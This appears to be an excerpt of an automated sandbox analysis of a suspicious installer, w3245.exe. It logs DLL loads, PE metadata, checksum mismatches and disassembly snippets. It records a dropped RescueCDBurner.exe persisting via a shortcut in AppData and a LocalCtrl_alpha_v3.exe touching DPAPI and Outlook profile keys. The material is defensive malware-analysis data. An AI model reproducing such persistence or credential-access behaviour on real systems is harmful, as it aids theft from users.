Source: C:\Windows\Temp\{555CA19E-1428-40AD-9391-D8257758E5AA}\.cr\w3245.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Windows\Temp\{555CA19E-1428-40AD-9391-D8257758E5AA}\.cr\w3245.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Windows\Temp\{555CA19E-1428-40AD-9391-D8257758E5AA}\.cr\w3245.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Windows\Temp\{7CEE328D-709D-46B2-B311-5917A7EA14A8}\.ba\RescueCDBurner.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Windows\Temp\{7CEE328D-709D-46B2-B311-5917A7EA14A8}\.ba\RescueCDBurner.exeSection loaded: starburn.dllJump to behavior
Source: C:\Windows\Temp\{7CEE328D-709D-46B2-B311-5917A7EA14A8}\.ba\RescueCDBurner.exeSection loaded: qtcore4.dllJump to behavior
Source: C:\Windows\Temp\{7CEE328D-709D-46B2-B311-5917A7EA14A8}\.ba\RescueCDBurner.exeSection loaded: qtgui4.dllJump to behavior
Source: C:\Windows\Temp\{7CEE328D-709D-46B2-B311-5917A7EA14A8}\.ba\RescueCDBurner.exeSection loaded: qtnetwork4.dllJump to behavior
Source: C:\Windows\Temp\{7CEE328D-709D-46B2-B311-5917A7EA14A8}\.ba\RescueCDBurner.exeSection loaded: qtxml4.dllJump to behavior
Source: C:\Windows\Temp\{7CEE328D-709D-46B2-B311-5917A7EA14A8}\.ba\RescueCDBurner.exeSection loaded: msvcp100.dllJump to behavior
Source: C:\Windows\Temp\{7CEE328D-709D-46B2-B311-5917A7EA14A8}\.ba\RescueCDBurner.exeSection loaded: msvcr100.dllJump to behavior
Source: C:\Windows\Temp\{7CEE328D-709D-46B2-B311-5917A7EA14A8}\.ba\RescueCDBurner.exeSection loaded: dbghelp.dllJump to behavior
Source: C:\Windows\Temp\{7CEE328D-709D-46B2-B311-5917A7EA14A8}\.ba\RescueCDBurner.exeSection loaded: qtcore4.dllJump to behavior
Source: C:\Windows\Temp\{7CEE328D-709D-46B2-B311-5917A7EA14A8}\.ba\RescueCDBurner.exeSection loaded: msvcr100.dllJump to behavior
Source: C:\Windows\Temp\{7CEE328D-709D-46B2-B311-5917A7EA14A8}\.ba\RescueCDBurner.exeSection loaded: qtcore4.dllJump to behavior
Source: C:\Windows\Temp\{7CEE328D-709D-46B2-B311-5917A7EA14A8}\.ba\RescueCDBurner.exeSection loaded: msvcp100.dllJump to behavior
Source: C:\Windows\Temp\{7CEE328D-709D-46B2-B311-5917A7EA14A8}\.ba\RescueCDBurner.exeSection loaded: msvcr100.dllJump to behavior
Source: C:\Windows\Temp\{7CEE328D-709D-46B2-B311-5917A7EA14A8}\.ba\RescueCDBurner.exeSection loaded: msvcr100.dllJump to behavior
Source: C:\Windows\Temp\{7CEE328D-709D-46B2-B311-5917A7EA14A8}\.ba\RescueCDBurner.exeSection loaded: winmm.dllJump to behavior
Source: C:\Windows\Temp\{7CEE328D-709D-46B2-B311-5917A7EA14A8}\.ba\RescueCDBurner.exeSection loaded: qtcore4.dllJump to behavior
Source: C:\Windows\Temp\{7CEE328D-709D-46B2-B311-5917A7EA14A8}\.ba\RescueCDBurner.exeSection loaded: dbgcore.dllJump to behavior
Source: C:\Windows\Temp\{7CEE328D-709D-46B2-B311-5917A7EA14A8}\.ba\RescueCDBurner.exeSection loaded: pla.dllJump to behavior
Source: C:\Windows\Temp\{7CEE328D-709D-46B2-B311-5917A7EA14A8}\.ba\RescueCDBurner.exeSection loaded: pdh.dllJump to behavior
Source: C:\Windows\Temp\{7CEE328D-709D-46B2-B311-5917A7EA14A8}\.ba\RescueCDBurner.exeSection loaded: tdh.dllJump to behavior
Source: C:\Windows\Temp\{7CEE328D-709D-46B2-B311-5917A7EA14A8}\.ba\RescueCDBurner.exeSection loaded: cabinet.dllJump to behavior
Source: C:\Windows\Temp\{7CEE328D-709D-46B2-B311-5917A7EA14A8}\.ba\RescueCDBurner.exeSection loaded: wevtapi.dllJump to behavior
Source: C:\Windows\Temp\{7CEE328D-709D-46B2-B311-5917A7EA14A8}\.ba\RescueCDBurner.exeSection loaded: shdocvw.dllJump to behavior
Source: C:\Windows\Temp\{7CEE328D-709D-46B2-B311-5917A7EA14A8}\.ba\RescueCDBurner.exeSection loaded: ntmarta.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exeSection loaded: starburn.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exeSection loaded: qtcore4.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exeSection loaded: qtgui4.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exeSection loaded: qtnetwork4.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exeSection loaded: qtxml4.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exeSection loaded: msvcp100.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exeSection loaded: msvcr100.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exeSection loaded: dbghelp.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exeSection loaded: msvcp100.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exeSection loaded: msvcr100.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exeSection loaded: msvcr100.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exeSection loaded: msvcp100.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exeSection loaded: msvcr100.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exeSection loaded: msvcr100.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exeSection loaded: dbgcore.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exeSection loaded: winmm.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exeSection loaded: pla.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exeSection loaded: pdh.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exeSection loaded: tdh.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exeSection loaded: cabinet.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exeSection loaded: wevtapi.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exeSection loaded: shdocvw.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: winbrand.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: propsys.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: linkinfo.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: ntshrui.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: cscapi.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: bitsproxy.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: netutils.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exeSection loaded: starburn.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exeSection loaded: qtcore4.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exeSection loaded: qtgui4.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exeSection loaded: qtnetwork4.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exeSection loaded: qtxml4.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exeSection loaded: msvcp100.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exeSection loaded: msvcr100.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exeSection loaded: dbghelp.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exeSection loaded: msvcp100.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exeSection loaded: msvcr100.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exeSection loaded: msvcr100.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exeSection loaded: winmm.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exeSection loaded: msvcp100.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exeSection loaded: msvcr100.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exeSection loaded: dbgcore.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exeSection loaded: pla.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exeSection loaded: pdh.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exeSection loaded: tdh.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exeSection loaded: cabinet.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exeSection loaded: wevtapi.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exeSection loaded: shdocvw.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: winbrand.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: wldp.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeSection loaded: shdocvw.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeSection loaded: version.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeSection loaded: wldp.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeSection loaded: profapi.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeSection loaded: winnsi.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeSection loaded: dhcpcsvc6.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeSection loaded: dhcpcsvc.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeSection loaded: webio.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeSection loaded: schannel.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeSection loaded: mskeyprotect.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeSection loaded: ntasn1.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeSection loaded: ncrypt.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeSection loaded: ncryptsslp.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeSection loaded: dpapi.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeSection loaded: windowscodecs.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeSection loaded: shdocvw.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeSection loaded: version.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeSection loaded: wldp.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeSection loaded: profapi.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeSection loaded: winnsi.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeSection loaded: dhcpcsvc6.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeSection loaded: dhcpcsvc.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeSection loaded: webio.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeSection loaded: schannel.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeSection loaded: mskeyprotect.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeSection loaded: ntasn1.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeSection loaded: ncrypt.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeSection loaded: ncryptsslp.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeSection loaded: dpapi.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeSection loaded: windowscodecs.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Users\user\Desktop\w3245.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{F6D90F11-9C73-11D3-B32E-00C04F990BB4}\InProcServer32Jump to behavior
Source: bxigrg.4.drLNK file: ..\..\Roaming\TaskManage\RescueCDBurner.exe
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
Source: w3245.exeStatic file information: File size 15806278 > 1048576
Source: C:\Windows\Temp\{7CEE328D-709D-46B2-B311-5917A7EA14A8}\.ba\RescueCDBurner.exeFile opened: C:\Windows\Temp\{7CEE328D-709D-46B2-B311-5917A7EA14A8}\.ba\msvcr100.dllJump to behavior
Source: w3245.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: w3245.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: w3245.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: w3245.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: w3245.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: w3245.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
Source: w3245.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: w3245.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Binary string: C:\agent\_work\8\s\build\ship\x86\burn.pdb source: w3245.exe, 00000000.00000002.2023002731.000000000094B000.00000002.00000001.01000000.00000003.sdmp, w3245.exe, 00000000.00000000.1694764523.000000000094B000.00000002.00000001.01000000.00000003.sdmp, w3245.exe, 00000001.00000000.1701554751.0000000000CCB000.00000002.00000001.01000000.00000005.sdmp, w3245.exe, 00000001.00000002.2021068287.0000000000CCB000.00000002.00000001.01000000.00000005.sdmp
Source: Binary string: msvcp100.i386.pdb source: RescueCDBurner.exe, RescueCDBurner.exe, 00000003.00000002.1807193825.000000006B491000.00000020.00000001.01000000.00000015.sdmp, RescueCDBurner.exe, 0000000A.00000002.2073421125.000000006BDB1000.00000020.00000001.01000000.00000015.sdmp
Source: Binary string: msvcr100.i386.pdb source: RescueCDBurner.exe, RescueCDBurner.exe, 00000003.00000002.1807089950.000000006B3D1000.00000020.00000001.01000000.00000016.sdmp, RescueCDBurner.exe, 0000000A.00000002.2073697527.000000006BFB1000.00000020.00000001.01000000.00000016.sdmp
Source: Binary string: wntdll.pdbUGP source: RescueCDBurner.exe, 00000002.00000002.1748082870.000000000A080000.00000004.00000800.00020000.00000000.sdmp, RescueCDBurner.exe, 00000002.00000002.1747896540.0000000009D22000.00000004.00000020.00020000.00000000.sdmp, RescueCDBurner.exe, 00000003.00000002.1805704607.000000000A11A000.00000004.00000020.00020000.00000000.sdmp, RescueCDBurner.exe, 00000003.00000002.1805953912.000000000A82C000.00000004.00000001.00020000.00000000.sdmp, RescueCDBurner.exe, 00000003.00000002.1805820438.000000000A470000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000004.00000002.2091445056.0000000004D9B000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000004.00000002.2092120165.0000000005670000.00000004.00001000.00020000.00000000.sdmp, RescueCDBurner.exe, 0000000A.00000002.2068385981.000000000A215000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: wntdll.pdb source: RescueCDBurner.exe, 00000002.00000002.1748082870.000000000A080000.00000004.00000800.00020000.00000000.sdmp, RescueCDBurner.exe, 00000002.00000002.1747896540.0000000009D22000.00000004.00000020.00020000.00000000.sdmp, RescueCDBurner.exe, 00000003.00000002.1805704607.000000000A11A000.00000004.00000020.00020000.00000000.sdmp, RescueCDBurner.exe, 00000003.00000002.1805953912.000000000A82C000.00000004.00000001.00020000.00000000.sdmp, RescueCDBurner.exe, 00000003.00000002.1805820438.000000000A470000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000004.00000002.2091445056.0000000004D9B000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000004.00000002.2092120165.0000000005670000.00000004.00001000.00020000.00000000.sdmp, RescueCDBurner.exe, 0000000A.00000002.2068385981.000000000A215000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: E:\PassNow\MagicRescueCD\CD_Win_Burner\Release\RescueCDBurner.pdb0 source: RescueCDBurner.exe, 00000002.00000002.1735661365.0000000000654000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000002.00000003.1731750258.0000000000E9A000.00000004.00000001.00020000.00000000.sdmp, RescueCDBurner.exe, 00000002.00000000.1720100266.0000000000654000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000003.00000002.1801166894.0000000000654000.00000002.00000001.01000000.00000010.sdmp, RescueCDBurner.exe, 00000003.00000000.1734881847.0000000000654000.00000002.00000001.01000000.00000010.sdmp
Source: Binary string: E:\PassNow\MagicRescueCD\CD_Win_Burner\Release\RescueCDBurner.pdb source: RescueCDBurner.exe, 00000002.00000002.1735661365.0000000000654000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000002.00000003.1731750258.0000000000E9A000.00000004.00000001.00020000.00000000.sdmp, RescueCDBurner.exe, 00000002.00000000.1720100266.0000000000654000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000003.00000002.1801166894.0000000000654000.00000002.00000001.01000000.00000010.sdmp, RescueCDBurner.exe, 00000003.00000000.1734881847.0000000000654000.00000002.00000001.01000000.00000010.sdmp
Source: Binary string: f:\starburn\Bin\LIBCMT\Dynamic\Release\i386\StarBurn.pdb source: RescueCDBurner.exe, 00000002.00000002.1749820013.000000006CAD1000.00000020.00000001.01000000.00000008.sdmp, RescueCDBurner.exe, 00000003.00000002.1807780117.000000006B8F1000.00000020.00000001.01000000.00000011.sdmp, RescueCDBurner.exe, 0000000A.00000002.2074506885.000000006F841000.00000020.00000001.01000000.00000011.sdmp
Source: w3245.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: w3245.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: w3245.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: w3245.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: w3245.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
Source: C:\Windows\Temp\{555CA19E-1428-40AD-9391-D8257758E5AA}\.cr\w3245.exeCode function: 1_2_5BB3CB21 _GetDiskFreeSpaceEx_@16,GetVersionExA,SetLastError,newMultiByteFromWideChar,LoadLibraryW,GetProcAddress,FreeLibrary,GlobalFree,1_2_5BB3CB21
Source: hsiywoxwiypiaj.4.drStatic PE information: real checksum: 0x2865d3 should be: 0x28b45f
Source: QtCore4.dll.1.drStatic PE information: real checksum: 0x283beb should be: 0x284aa4
Source: QtCore4.dll.2.drStatic PE information: real checksum: 0x283beb should be: 0x284aa4
Source: eykunyxpxybnsa.11.drStatic PE information: real checksum: 0x2865d3 should be: 0x28b45f
Source: Fondue.dll.1.drStatic PE information: real checksum: 0x34dc9 should be: 0x3baae
Source: StarBurn.dll.1.drStatic PE information: real checksum: 0xa4afa should be: 0xab76c
Source: StarBurn.dll.2.drStatic PE information: real checksum: 0xa4afa should be: 0xab76c
Source: w3245.exeStatic PE information: section name: .wixburn
Source: w3245.exe.0.drStatic PE information: section name: .wixburn
Source: LocalCtrl_alpha_v3.exe.4.drStatic PE information: section name: Shared
Source: hsiywoxwiypiaj.4.drStatic PE information: section name: .xdata
Source: hsiywoxwiypiaj.4.drStatic PE information: section name: gjwrx
Source: eykunyxpxybnsa.11.drStatic PE information: section name: .xdata
Source: eykunyxpxybnsa.11.drStatic PE information: section name: gjwrx
Source: C:\Users\user\Desktop\w3245.exeCode function: 0_2_0092EAD6 push ecx; ret 0_2_0092EAE9
Source: C:\Windows\Temp\{555CA19E-1428-40AD-9391-D8257758E5AA}\.cr\w3245.exeCode function: 1_2_00CB10CD push 00000005h; retf 1_2_00CB10CF
Source: C:\Windows\Temp\{555CA19E-1428-40AD-9391-D8257758E5AA}\.cr\w3245.exeCode function: 1_2_00CAEAD6 push ecx; ret 1_2_00CAEAE9
Source: C:\Windows\Temp\{7CEE328D-709D-46B2-B311-5917A7EA14A8}\.ba\RescueCDBurner.exeCode function: 2_2_6BD312B5 push ecx; ret 2_2_6BD312C8
Source: C:\Windows\Temp\{7CEE328D-709D-46B2-B311-5917A7EA14A8}\.ba\RescueCDBurner.exeCode function: 2_2_6BC22020 push ecx; mov dword ptr [esp], 00000000h2_2_6BC22021
Source: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exeCode function: 3_2_6B0C89C5 push ecx; ret 3_2_6B0C89D8
Source: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exeCode function: 3_2_6B3D2D88 push eax; ret 3_2_6B3D2DA6
Source: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exeCode function: 3_2_6B3E0CC5 push ecx; ret 3_2_6B3E0CD8
